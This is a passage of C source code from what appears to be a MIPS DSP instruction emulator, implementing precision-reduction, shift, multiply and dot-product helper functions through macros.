((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | ((uint64_t)rt2 << 8) | (uint64_t)rt0; return temp; } target_ulong helper_precrq_qh_pw(target_ulong rs, target_ulong rt) { uint16_t tempD, tempC, tempB, tempA; tempD = (rs >> 48) & MIPSDSP_LO; tempC = (rs >> 16) & MIPSDSP_LO; tempB = (rt >> 48) & MIPSDSP_LO; tempA = (rt >> 16) & MIPSDSP_LO; return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); } target_ulong helper_precrq_rs_qh_pw(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint32_t rs2, rs0; uint32_t rt2, rt0; uint16_t tempD, tempC, tempB, tempA; rs2 = (rs >> 32) & MIPSDSP_LLO; rs0 = rs & MIPSDSP_LLO; rt2 = (rt >> 32) & MIPSDSP_LLO; rt0 = rt & MIPSDSP_LLO; tempD = mipsdsp_trunc16_sat16_round(rs2, env); tempC = mipsdsp_trunc16_sat16_round(rs0, env); tempB = mipsdsp_trunc16_sat16_round(rt2, env); tempA = mipsdsp_trunc16_sat16_round(rt0, env); return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); } target_ulong helper_precrq_pw_l(target_ulong rs, target_ulong rt) { uint32_t tempB, tempA; tempB = (rs >> 32) & MIPSDSP_LLO; tempA = (rt >> 32) & MIPSDSP_LLO; return MIPSDSP_RETURN64_32(tempB, tempA); } #endif target_ulong helper_precrqu_s_qb_ph(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint8_t tempD, tempC, tempB, tempA; uint16_t rsh, rsl, rth, rtl; rsh = (rs & MIPSDSP_HI) >> 16; rsl = rs & MIPSDSP_LO; rth = (rt & MIPSDSP_HI) >> 16; rtl = rt & MIPSDSP_LO; tempD = mipsdsp_sat8_reduce_precision(rsh, env); tempC = mipsdsp_sat8_reduce_precision(rsl, env); tempB = mipsdsp_sat8_reduce_precision(rth, env); tempA = mipsdsp_sat8_reduce_precision(rtl, env); return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); } #if defined(TARGET_MIPS64) target_ulong helper_precrqu_s_ob_qh(target_ulong rs, target_ulong rt, CPUMIPSState *env) { int i; uint16_t rs3, rs2, rs1, rs0; uint16_t rt3, rt2, rt1, rt0; uint8_t temp[8]; uint64_t result; result = 0; MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); temp[7] = mipsdsp_sat8_reduce_precision(rs3, env); temp[6] = mipsdsp_sat8_reduce_precision(rs2, env); temp[5] = mipsdsp_sat8_reduce_precision(rs1, env); temp[4] = mipsdsp_sat8_reduce_precision(rs0, env); temp[3] = mipsdsp_sat8_reduce_precision(rt3, env); temp[2] = mipsdsp_sat8_reduce_precision(rt2, env); temp[1] = mipsdsp_sat8_reduce_precision(rt1, env); temp[0] = mipsdsp_sat8_reduce_precision(rt0, env); for (i = 0; i < 8; i++) { result |= (uint64_t)temp[i] << (8 * i); } return result; } #define PRECEQ_PW(name, a, b) \ target_ulong helper_preceq_pw_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ uint32_t tempBI, tempAI; \ \ tempB = (rt >> a) & MIPSDSP_LO; \ tempA = (rt >> b) & MIPSDSP_LO; \ \ tempBI = (uint32_t)tempB << 16; \ tempAI = (uint32_t)tempA << 16; \ \ return MIPSDSP_RETURN64_32(tempBI, tempAI); \ } PRECEQ_PW(qhl, 48, 32); PRECEQ_PW(qhr, 16, 0); PRECEQ_PW(qhla, 48, 16); PRECEQ_PW(qhra, 32, 0); #undef PRECEQ_PW #endif #define PRECEQU_PH(name, a, b) \ target_ulong helper_precequ_ph_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ tempB = tempB << 7; \ tempA = tempA << 7; \ \ return MIPSDSP_RETURN32_16(tempB, tempA); \ } PRECEQU_PH(qbl, 24, 16); PRECEQU_PH(qbr, 8, 0); PRECEQU_PH(qbla, 24, 8); PRECEQU_PH(qbra, 16, 0); #undef PRECEQU_PH #if defined(TARGET_MIPS64) #define PRECEQU_QH(name, a, b, c, d) \ target_ulong helper_precequ_qh_##name(target_ulong rt) \ { \ uint16_t tempD, tempC, tempB, tempA; \ \ tempD = (rt >> a) & MIPSDSP_Q0; \ tempC = (rt >> b) & MIPSDSP_Q0; \ tempB = (rt >> c) & MIPSDSP_Q0; \ tempA = (rt >> d) & MIPSDSP_Q0; \ \ tempD = tempD << 7; \ tempC = tempC << 7; \ tempB = tempB << 7; \ tempA = tempA << 7; \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECEQU_QH(obl, 56, 48, 40, 32); PRECEQU_QH(obr, 24, 16, 8, 0); PRECEQU_QH(obla, 56, 40, 24, 8); PRECEQU_QH(obra, 48, 32, 16, 0); #undef PRECEQU_QH #endif #define PRECEU_PH(name, a, b) \ target_ulong helper_preceu_ph_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN32_16(tempB, tempA); \ } PRECEU_PH(qbl, 24, 16); PRECEU_PH(qbr, 8, 0); PRECEU_PH(qbla, 24, 8); PRECEU_PH(qbra, 16, 0); #undef PRECEU_PH #if defined(TARGET_MIPS64) #define PRECEU_QH(name, a, b, c, d) \ target_ulong helper_preceu_qh_##name(target_ulong rt) \ { \ uint16_t tempD, tempC, tempB, tempA; \ \ tempD = (rt >> a) & MIPSDSP_Q0; \ tempC = (rt >> b) & MIPSDSP_Q0; \ tempB = (rt >> c) & MIPSDSP_Q0; \ tempA = (rt >> d) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECEU_QH(obl, 56, 48, 40, 32); PRECEU_QH(obr, 24, 16, 8, 0); PRECEU_QH(obla, 56, 40, 24, 8); PRECEU_QH(obra, 48, 32, 16, 0); #undef PRECEU_QH #endif /** DSP GPR-Based Shift Sub-class insns **/ #define SHIFT_QB(name, func) \ target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt) \ { \ uint8_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x07; \ \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa); \ rt2 = mipsdsp_##func(rt2, sa); \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ } #define SHIFT_QB_ENV(name, func) \ target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt,\ CPUMIPSState *env) \ { \ uint8_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x07; \ \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa, env); \ rt2 = mipsdsp_##func(rt2, sa, env); \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ } SHIFT_QB_ENV(shll, lshift8); SHIFT_QB(shrl, rshift_u8); SHIFT_QB(shra, rashift8); SHIFT_QB(shra_r, rnd8_rashift); #undef SHIFT_QB #undef SHIFT_QB_ENV #if defined(TARGET_MIPS64) #define SHIFT_OB(name, func) \ target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa) \ { \ int i; \ uint8_t rt_t[8]; \ uint64_t temp; \ \ sa = sa & 0x07; \ temp = 0; \ \ for (i = 0; i < 8; i++) { \ rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ rt_t[i] = mipsdsp_##func(rt_t[i], sa); \ temp |= (uint64_t)rt_t[i] << (8 * i); \ } \ \ return temp; \ } #define SHIFT_OB_ENV(name, func) \ target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ int i; \ uint8_t rt_t[8]; \ uint64_t temp; \ \ sa = sa & 0x07; \ temp = 0; \ \ for (i = 0; i < 8; i++) { \ rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ rt_t[i] = mipsdsp_##func(rt_t[i], sa, env); \ temp |= (uint64_t)rt_t[i] << (8 * i); \ } \ \ return temp; \ } SHIFT_OB_ENV(shll, lshift8); SHIFT_OB(shrl, rshift_u8); SHIFT_OB(shra, rashift8); SHIFT_OB(shra_r, rnd8_rashift); #undef SHIFT_OB #undef SHIFT_OB_ENV #endif #define SHIFT_PH(name, func) \ target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rth, rtl; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ rth = mipsdsp_##func(rth, sa, env); \ rtl = mipsdsp_##func(rtl, sa, env); \ \ return MIPSDSP_RETURN32_16(rth, rtl); \ } SHIFT_PH(shll, lshift16); SHIFT_PH(shll_s, sat16_lshift); #undef SHIFT_PH #if defined(TARGET_MIPS64) #define SHIFT_QH(name, func) \ target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa) \ { \ uint16_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa); \ rt2 = mipsdsp_##func(rt2, sa); \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ } #define SHIFT_QH_ENV(name, func) \ target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ uint16_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa, env); \ rt2 = mipsdsp_##func(rt2, sa, env); \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ } SHIFT_QH_ENV(shll, lshift16); SHIFT_QH_ENV(shll_s, sat16_lshift); SHIFT_QH(shrl, rshift_u16); SHIFT_QH(shra, rashift16); SHIFT_QH(shra_r, rnd16_rashift); #undef SHIFT_QH #undef SHIFT_QH_ENV #endif #define SHIFT_W(name, func) \ target_ulong helper_##name##_w(target_ulong sa, target_ulong rt) \ { \ uint32_t temp; \ \ sa = sa & 0x1F; \ temp = mipsdsp_##func(rt, sa); \ \ return (target_long)(int32_t)temp; \ } #define SHIFT_W_ENV(name, func) \ target_ulong helper_##name##_w(target_ulong sa, target_ulong rt, \ CPUMIPSState *env) \ { \ uint32_t temp; \ \ sa = sa & 0x1F; \ temp = mipsdsp_##func(rt, sa, env); \ \ return (target_long)(int32_t)temp; \ } SHIFT_W_ENV(shll_s, sat32_lshift); SHIFT_W(shra_r, rnd32_rashift); #undef SHIFT_W #undef SHIFT_W_ENV #if defined(TARGET_MIPS64) #define SHIFT_PW(name, func) \ target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa) \ { \ uint32_t rt1, rt0; \ \ sa = sa & 0x1F; \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN64_32(rt1, rt0); \ } #define SHIFT_PW_ENV(name, func) \ target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ uint32_t rt1, rt0; \ \ sa = sa & 0x1F; \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN64_32(rt1, rt0); \ } SHIFT_PW_ENV(shll, lshift32); SHIFT_PW_ENV(shll_s, sat32_lshift); SHIFT_PW(shra, rashift32); SHIFT_PW(shra_r, rnd32_rashift); #undef SHIFT_PW #undef SHIFT_PW_ENV #endif #define SHIFT_PH(name, func) \ target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt) \ { \ uint16_t rth, rtl; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ rth = mipsdsp_##func(rth, sa); \ rtl = mipsdsp_##func(rtl, sa); \ \ return MIPSDSP_RETURN32_16(rth, rtl); \ } SHIFT_PH(shrl, rshift_u16); SHIFT_PH(shra, rashift16); SHIFT_PH(shra_r, rnd16_rashift); #undef SHIFT_PH /** DSP Multiply Sub-class insns **/ /* * Return value made up by two 16bits value. * FIXME give the macro a better name. */ #define MUL_RETURN32_16_PH(name, func, \ rsmov1, rsmov2, rsfilter, \ rtmov1, rtmov2, rtfilter) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rsB, rsA, rtB, rtA; \ \ rsB = (rs >> rsmov1) & rsfilter; \ rsA = (rs >> rsmov2) & rsfilter; \ rtB = (rt >> rtmov1) & rtfilter; \ rtA = (rt >> rtmov2) & rtfilter; \ \ rsB = mipsdsp_##func(rsB, rtB, env); \ rsA = mipsdsp_##func(rsA, rtA, env); \ \ return MIPSDSP_RETURN32_16(rsB, rsA); \ } MUL_RETURN32_16_PH(muleu_s_ph_qbl, mul_u8_u16, \ 24, 16, MIPSDSP_Q0, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(muleu_s_ph_qbr, mul_u8_u16, \ 8, 0, MIPSDSP_Q0, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mulq_rs_ph, rndq15_mul_q15_q15, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mul_ph, mul_i16_i16, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mul_s_ph, sat16_mul_i16_i16, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mulq_s_ph, sat16_mul_q15_q15, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); #undef MUL_RETURN32_16_PH #define MUL_RETURN32_32_ph(name, func, movbits) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t temp; \ \ rsh = (rs >> movbits) & MIPSDSP_LO; \ rth = (rt >> movbits) & MIPSDSP_LO; \ temp = mipsdsp_##func(rsh, rth, env); \ \ return (target_long)(int32_t)temp; \ } MUL_RETURN32_32_ph(muleq_s_w_phl, mul_q15_q15_overflowflag21, 16); MUL_RETURN32_32_ph(muleq_s_w_phr, mul_q15_q15_overflowflag21, 0); #undef MUL_RETURN32_32_ph #define MUL_VOID_PH(name, use_ac_env) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rsl, rth, rtl; \ int32_t tempB, tempA; \ int64_t acc, dotp; \ \ MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ if (use_ac_env == 1) { \ tempB = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ tempA = mipsdsp_mul_q15_q15(ac, rsl, rtl, env); \ } else { \ tempB = mipsdsp_mul_u16_u16(rsh, rth); \ tempA = mipsdsp_mul_u16_u16(rsl, rtl); \ } \ \ dotp = (int64_t)tempB - (int64_t)tempA; \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ dotp = dotp + acc; \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((dotp & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(dotp & MIPSDSP_LLO); \ } MUL_VOID_PH(mulsaq_s_w_ph, 1); MUL_VOID_PH(mulsa_w_ph, 0); #undef MUL_VOID_PH #if defined(TARGET_MIPS64) #define MUL_RETURN64_16_QH(name, func, \ rsmov1, rsmov2, rsmov3, rsmov4, rsfilter, \ rtmov1, rtmov2, rtmov3, rtmov4, rtfilter) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rs3, rs2, rs1, rs0; \ uint16_t rt3, rt2, rt1, rt0; \ uint16_t tempD, tempC, tempB, tempA; \ \ rs3 = (rs >> rsmov1) & rsfilter; \ rs2 = (rs >> rsmov2) & rsfilter; \ rs1 = (rs >> rsmov3) & rsfilter; \ rs0 = (rs >> rsmov4) & rsfilter; \ rt3 = (rt >> rtmov1) & rtfilter; \ rt2 = (rt >> rtmov2) & rtfilter; \ rt1 = (rt >> rtmov3) & rtfilter; \ rt0 = (rt >> rtmov4) & rtfilter; \ \ tempD = mipsdsp_##func(rs3, rt3, env); \ tempC = mipsdsp_##func(rs2, rt2, env); \ tempB = mipsdsp_##func(rs1, rt1, env); \ tempA = mipsdsp_##func(rs0, rt0, env); \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } MUL_RETURN64_16_QH(muleu_s_qh_obl, mul_u8_u16, \ 56, 48, 40, 32, MIPSDSP_Q0, \ 48, 32, 16, 0, MIPSDSP_LO); MUL_RETURN64_16_QH(muleu_s_qh_obr, mul_u8_u16, \ 24, 16, 8, 0, MIPSDSP_Q0, \ 48, 32, 16, 0, MIPSDSP_LO); MUL_RETURN64_16_QH(mulq_rs_qh, rndq15_mul_q15_q15, \ 48, 32, 16, 0, MIPSDSP_LO, \ 48, 32, 16, 0, MIPSDSP_LO); #undef MUL_RETURN64_16_QH #define MUL_RETURN64_32_QH(name, \ rsmov1, rsmov2, \ rtmov1, rtmov2) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rsB, rsA; \ uint16_t rtB, rtA; \ uint32_t tempB, tempA; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = mipsdsp_mul_q15_q15(5, rsB, rtB, env); \ tempA = mipsdsp_mul_q15_q15(5, rsA, rtA, env); \ \ return ((uint64_t)tempB << 32) | (uint64_t)tempA; \ } MUL_RETURN64_32_QH(muleq_s_pw_qhl, 48, 32, 48, 32); MUL_RETURN64_32_QH(muleq_s_pw_qhr, 16, 0, 16, 0); #undef MUL_RETURN64_32_QH void helper_mulsaq_s_w_qh(target_ulong rs, target_ulong rt, uint32_t ac, CPUMIPSState *env) { int16_t rs3, rs2, rs1, rs0; int16_t rt3, rt2, rt1, rt0; int32_t tempD, tempC, tempB, tempA; int64_t acc[2]; int64_t temp[2]; int64_t temp_sum; MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); temp[0] = ((int32_t)tempD - (int32_t)tempC) + ((int32_t)tempB - (int32_t)tempA); temp[0] = (int64_t)(temp[0] << 30) >> 30; if (((temp[0] >> 33) & 0x01) == 0) { temp[1] = 0x00; } else { temp[1] = ~0ull; } acc[0] = env->active_tc.LO[ac]; acc[1] = env->active_tc.HI[ac]; temp_sum = acc[0] + temp[0]; if (((uint64_t)temp_sum < (uint64_t)acc[0]) && ((uint64_t)temp_sum < (uint64_t)temp[0])) { acc[1] += 1; } acc[0] = temp_sum; acc[1] += temp[1]; env->active_tc.HI[ac] = acc[1]; env->active_tc.LO[ac] = acc[0]; } #endif #define DP_QB(name, func, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint8_t rs3, rs2; \ uint8_t rt3, rt2; \ uint16_t tempB, tempA; \ uint64_t tempC, dotp; \ \ rs3 = (rs >> rsmov1) & MIPSDSP_Q0; \ rs2 = (rs >> rsmov2) & MIPSDSP_Q0; \ rt3 = (rt >> rtmov1) & MIPSDSP_Q0; \ rt2 = (rt >> rtmov2) & MIPSDSP_Q0; \ tempB = mipsdsp_##func(rs3, rt3); \ tempA = mipsdsp_##func(rs2, rt2); \ dotp = (int64_t)tempB + (int64_t)tempA; \ if (is_add) { \ tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + dotp; \ } else { \ tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ - dotp; \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((tempC & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(tempC & MIPSDSP_LLO); \ } DP_QB(dpau_h_qbl, mul_u8_u8, 1, 24, 16, 24, 16); DP_QB(dpau_h_qbr, mul_u8_u8, 1, 8, 0, 8, 0); DP_QB(dpsu_h_qbl, mul_u8_u8, 0, 24, 16, 24, 16); DP_QB(dpsu_h_qbr, mul_u8_u8, 0, 8, 0, 8, 0); #undef DP_QB #if defined(TARGET_MIPS64) #define DP_OB(name, add_sub, \ rsmov1, rsmov2, rsmov3, rsmov4, \ rtmov1, rtmov2, rtmov3, rtmov4) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ uint8_t rsD, rsC, rsB, rsA; \ uint8_t rtD, rtC, rtB, rtA; \ uint16_t tempD, tempC, tempB, tempA; \ uint64_t temp[2]; \ uint64_t acc[2]; \ uint64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rsD = (rs >> rsmov1) & MIPSDSP_Q0; \ rsC = (rs >> rsmov2) & MIPSDSP_Q0; \ rsB = (rs >> rsmov3) & MIPSDSP_Q0; \ rsA = (rs >> rsmov4) & MIPSDSP_Q0; \ rtD = (rt >> rtmov1) & MIPSDSP_Q0; \ rtC = (rt >> rtmov2) & MIPSDSP_Q0; \ rtB = (rt >> rtmov3) & MIPSDSP_Q0; \ rtA = (rt >> rtmov4) & MIPSDSP_Q0; \ \ tempD = mipsdsp_mul_u8_u8(rsD, rtD); \ tempC = mipsdsp_mul_u8_u8(rsC, rtC); \ tempB = mipsdsp_mul_u8_u8(rsB, rtB); \ tempA = mipsdsp_mul_u8_u8(rsA, rtA); \ \ temp[0] = (uint64_t)tempD + (uint64_t)tempC + \ (uint64_t)tempB + (uint64_t)tempA; \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ if (add_sub) { \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] + temp[1]; \ } else { \ temp_sum = acc[0] - temp[0]; \ if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ acc[1] -= 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] - temp[1]; \ } \ \ env->active_tc.HI[ac] = temp[1]; \ env->active_tc.LO[ac] = temp[0]; \ } DP_OB(dpau_h_obl, 1, 56, 48, 40, 32, 56, 48, 40, 32); DP_OB(dpau_h_obr, 1, 24, 16, 8, 0, 24, 16, 8, 0); DP_OB(dpsu_h_obl, 0, 56, 48, 40, 32, 56, 48, 40, 32); DP_OB(dpsu_h_obr, 0, 24, 16, 8, 0, 24, 16, 8, 0); #undef DP_OB #endif #define DP_NOFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsB, rsA, rtB, rtA; \ int32_t tempA, tempB; \ int64_t acc; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = (int32_t)rsB * (int32_t)rtB; \ tempA = (int32_t)rsA * (int32_t)rtA; \ \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ \ if (is_add) { \ acc = acc + ((int64_t)tempB + (int64_t)tempA); \ } else { \ acc = acc - ((int64_t)tempB + (int64_t)tempA); \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t)((acc & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(acc & MIPSDSP_LLO); \ } DP_NOFUNC_PH(dpa_w_ph, 1, 16, 0, 16, 0); DP_NOFUNC_PH(dpax_w_ph, 1, 16, 0, 0, 16); DP_NOFUNC_PH(dps_w_ph, 0, 16, 0, 16, 0); DP_NOFUNC_PH(dpsx_w_ph, 0, 16, 0, 0, 16); #undef DP_NOFUNC_PH #define DP_HASFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsB, rsA, rtB, rtA; \ int32_t tempB, tempA; \ int64_t acc, dotp; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = mipsdsp_mul_q15_q15(ac, rsB, rtB, env); \ tempA = mipsdsp_mul_q15_q15(ac, rsA, rtA, env); \ \ dotp = (int64_t)tempB + (int64_t)tempA; \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ \ if (is_add) { \ acc = acc + dotp; \ } else { \ acc = acc - dotp; \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((acc & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (acc & MIPSDSP_LLO); \ } DP_HASFUNC_PH(dpaq_s_w_ph, 1, 16, 0, 16, 0); DP_HASFUNC_PH(dpaqx_s_w_ph, 1, 16, 0, 0, 16); DP_HASFUNC_PH(dpsq_s_w_ph, 0, 16, 0, 16, 0); DP_HASFUNC_PH(dpsqx_s_w_ph, 0, 16, 0, 0, 16); #undef DP_HASFUNC_PH #define DP_128OPERATION_PH(name, is_add) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rsl, rth, rtl; \ int32_t tempB, tempA, tempC62_31, tempC63; \ int64_t acc, dotp, tempC; \ \ MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ tempB = mipsdsp_mul_q15_q15(ac, rsh, rtl, env); \ tempA = mipsdsp_mul_q15_q15(ac, rsl, rth, env); \ \ dotp = (int64_t)tempB + (int64_t)tempA; \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ if (is_add) { \ tempC = acc + dotp; \ } else { \ tempC = acc - dotp; \ } \ tempC63 = (tempC >> 63) & 0x01; \ tempC62_31 = (tempC >> 31) & 0xFFFFFFFF; \ \ if ((tempC63 == 0) && (tempC62_31 != 0x00000000)) { \ tempC = 0x7FFFFFFF; \ set_DSPControl_overflow_flag(1, 16 + ac, env); \ } \ \ if ((tempC63 == 1) && (tempC62_31 != 0xFFFFFFFF)) { \ tempC = (int64_t)(int32_t)0x80000000; \ set_DSPControl_overflow_flag(1, 16 + ac, env); \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((tempC & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (tempC & MIPSDSP_LLO); \ } DP_128OPERATION_PH(dpaqx_sa_w_ph, 1); DP_128OPERATION_PH(dpsqx_sa_w_ph, 0); #undef DP_128OPERATION_HP #if defined(TARGET_MIPS64) #define DP_QH(name, is_add, use_ac_env) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs3, rs2, rs1, rs0; \ int32_t rt3, rt2, rt1, rt0; \ int32_t tempD, tempC, tempB, tempA; \ int64_t acc[2]; \ int64_t temp[2]; \ int64_t temp_sum; \ \ MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ if (use_ac_env) { \ tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); \ tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); \ tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); \ tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); \ } else { \ tempD = mipsdsp_mul_u16_u16(rs3, rt3); \ tempC = mipsdsp_mul_u16_u16(rs2, rt2); \ tempB = mipsdsp_mul_u16_u16(rs1, 